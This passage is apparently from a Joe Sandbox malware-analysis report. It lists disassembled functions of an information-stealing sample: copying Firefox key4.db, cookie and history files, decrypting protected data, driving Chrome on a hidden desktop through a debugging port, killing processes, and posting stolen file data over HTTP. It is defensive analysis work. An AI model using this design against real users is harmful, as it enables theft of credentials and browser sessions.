FindClose.KERNEL32(?), ref: 0040D7B5

Part of subcall function 0040CCF2: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D342

Strings

_key4.db, xrefs: 0040CF5D, 0040CF78
_cookies.db, xrefs: 0040D3D6, 0040D3F4
_history.db, xrefs: 0040D1EE, 0040D20C
\key4.db, xrefs: 0040CDC6, 0040CDE4

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCopyCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrlen
String ID: \key4.db$_cookies.db$_history.db$_key4.db
API String ID: 2673225304-3347733256
Opcode ID: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
Instruction ID: 303406ac38d3177ba7cc7e5ed1d6b9532b3c71293ad990f1a43eb8195b1ed205
Opcode Fuzzy Hash: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
Instruction Fuzzy Hash: 3B62D8B5D002589BCF01EF65C881AED77B6FF55308F00915EE8156B292DB38ABC9CB94

Function 0040AB8F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 191
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040ABA9
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0040AC18
CreateDesktopA.USER32 ref: 0040AC3C
memset.MSVCRT ref: 0040AC53
lstrcatA.KERNEL32(?,?), ref: 0040AC5F
lstrcatA.KERNEL32(?,?), ref: 0040AC69
memset.MSVCRT ref: 0040ACA3
lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 0040AD04
CreateProcessA.KERNEL32 ref: 0040AD74
Sleep.KERNEL32(00001388), ref: 0040AD87

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 0040A7C1: memset.MSVCRT ref: 0040A895
Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,ws://localhost:9223,00000000,localhost,0042EEFC), ref: 0040A8FA
Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,?), ref: 0040A90A

Part of subcall function 00415342: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
Part of subcall function 00415342: Process32First.KERNEL32(00000000,?), ref: 00415362
Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 0041536E
Part of subcall function 00415342: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
Part of subcall function 00415342: TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153A8
Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 004153B0
Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153BB

CloseDesktop.USER32(?), ref: 0040AE3B

Strings

ChromeBuildTools, xrefs: 0040ABE6, 0040ABFE
OCALAPPDATA, xrefs: 0040ACD7, 0040ACF1

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcatmemset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcpy$FirstSleepSnapshotTerminateToolhelp32
String ID: ChromeBuildTools$OCALAPPDATA
API String ID: 1010841495-1746588603
Opcode ID: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
Instruction ID: ec91edd0ab285c5cc363a8a4a16679f2a80a84b4960ec0103b89f5f3963ca30b
Opcode Fuzzy Hash: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
Instruction Fuzzy Hash: 0C81E075C003499BDB01EF20DC467EABBB5BF55308F00921AF98876252EB74A7D8CB85

Function 00401825 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 775
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,?,?,004316B0,?,?,?,004316B0,?,?,00000028,00000028,?), ref: 00401A24
FindFirstFileA.KERNEL32(00000000,?,?,?,?,004316B0,?,?,?,004316B0,00000000,?,?,004316B0,?,?), ref: 00401BA7

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE

DeleteFileA.KERNEL32(00000000,?), ref: 00401E57
FindNextFileA.KERNEL32(?,?,?,?,?,004316B0), ref: 00401E8D
FindClose.KERNEL32(?,?,?,004316B0), ref: 00401EA4
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D82

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004020F2
DeleteFileA.KERNEL32(00000000,?), ref: 004021D0
FindNextFileA.KERNEL32(00000000,?), ref: 0040220F
FindClose.KERNEL32(00000000), ref: 0040221E

Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85

Strings

\*.*, xrefs: 00401911, 00401937

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcatlstrlen$AllocHandleLocalObjectReadSingleSizeSleepSystemThreadTimeWait
String ID: \*.*
API String ID: 2017216726-1173974218
Opcode ID: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
Instruction ID: 1220b35e9d2845434e99ad0bf1b72ddbdabecf6e0090be4ca8ca09fb3933a3c4
Opcode Fuzzy Hash: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
Instruction Fuzzy Hash: 4052B5B59002189BCF05FFA2CC56AEE7779AF44309F04815EF41567192DF386B89CBA8

Function 004152A5 Relevance: 13.6, APIs: 9, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004152BD
Process32First.KERNEL32(00000000,?), ref: 004152C7
Process32Next.KERNEL32(00000000,?), ref: 004152D3
StrCmpCA.SHLWAPI(?,?), ref: 004152ED
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415301
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415310
CloseHandle.KERNEL32(00000000), ref: 00415317
Process32Next.KERNEL32(00000000,?), ref: 00415324
CloseHandle.KERNEL32(00000000), ref: 0041532F

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
Instruction ID: a2afd96498c18a56c68c4cfc557fe070022b821dc9dd236c37024e5ac4685a68
Opcode Fuzzy Hash: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
Instruction Fuzzy Hash: 0E11C839200705AFD3202B61AC4EFAB7BADFFC6751F051019FA0592251DFB49851CA75

Function 00414B70 Relevance: 10.6, APIs: 7, Instructions: 66memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA
GetLastError.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414BF4
GetProcessHeap.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414C02
HeapFree.KERNEL32(00000000,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414C0D

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
String ID:
API String ID: 798923657-0
Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
Instruction ID: 1bfb67afbcc3eeebdcc58bb0437d5f96cd4b86678791dfef96fa76067c12a520
Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
Instruction Fuzzy Hash: C9118B75205205AFE7209FA5AC84F57BBA9FBC9744F16042DFA8083210DB79DC859BA0

Function 0040B006 Relevance: 4.5, APIs: 3, Instructions: 42memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0040B03B
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040B057
LocalFree.KERNEL32(?), ref: 0040B073

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
Instruction ID: 231cd1f39a8479791712d5f3edf0a94c60cf588e50de6fedb89cc5dbc35e2890
Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
Instruction Fuzzy Hash: D90140755083029BD701EF64D845A1BFBE5FFC8754F008A2AF88493351E730D994CB92

Function 00413D91 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,0040129D,?,004315D8), ref: 00413D94
HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040129D,?,004315D8), ref: 00413DA3
GetUserNameA.ADVAPI32(00000000), ref: 00413DB1

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
Instruction ID: 9335b4869ff5d5de368b717405b7ae0b04054e65bb97385264346cc33f41d643
Opcode Fuzzy Hash: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
Instruction Fuzzy Hash: B4D06CB5B002606FD620AB6AAC0DE8B3A6CEB8AB65B850170F905D7250D6749846C6A9

Function 00407382 Relevance: 60.3, APIs: 27, Strings: 7, Instructions: 761
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A

Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
Part of subcall function 00414B70: GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
Part of subcall function 00414B70: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA

lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
InternetOpenA.WININET ref: 0040747C
InternetConnectA.WININET ref: 004075D6
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00407611
InternetSetOptionA.WININET(?,0000001F,FFFFFFFF,00000004), ref: 0040763E

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,?,?,00633851,?,?,?,?), ref: 00407A63
lstrlenA.KERNEL32(00000000), ref: 00407A79
GetProcessHeap.KERNEL32 ref: 00407A85
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00407A92
lstrlenA.KERNEL32(00000000), ref: 00407AB1
memcpy.MSVCRT(00000000,0041A9AE,00000000), ref: 00407AB8
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 00407AD1
memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000014), ref: 00407ADC
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407AF5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B17
memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B1C
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B45
HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407B5B
Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B69
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00407BE2
InternetReadFile.WININET(?,?,000007CF,?), ref: 00407C17
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00407C64
StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407CAC
ExitProcess.KERNEL32 ref: 00407CB7
InternetCloseHandle.WININET(?), ref: 00407CC0
InternetCloseHandle.WININET(00000000), ref: 00407CCA

Strings

--, xrefs: 0040753B
build_id, xrefs: 00407821, 0040783C
------, xrefs: 00407676, 004077A6, 004078AE, 004078B5, 00407989, 0040798E
------, xrefs: 004074FB
", xrefs: 0040774C, 0040785C, 00407863, 0040793A, 0040793F, 00407A3B
file_data, xrefs: 00407A05, 00407A1F
block, xrefs: 00407CA6

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
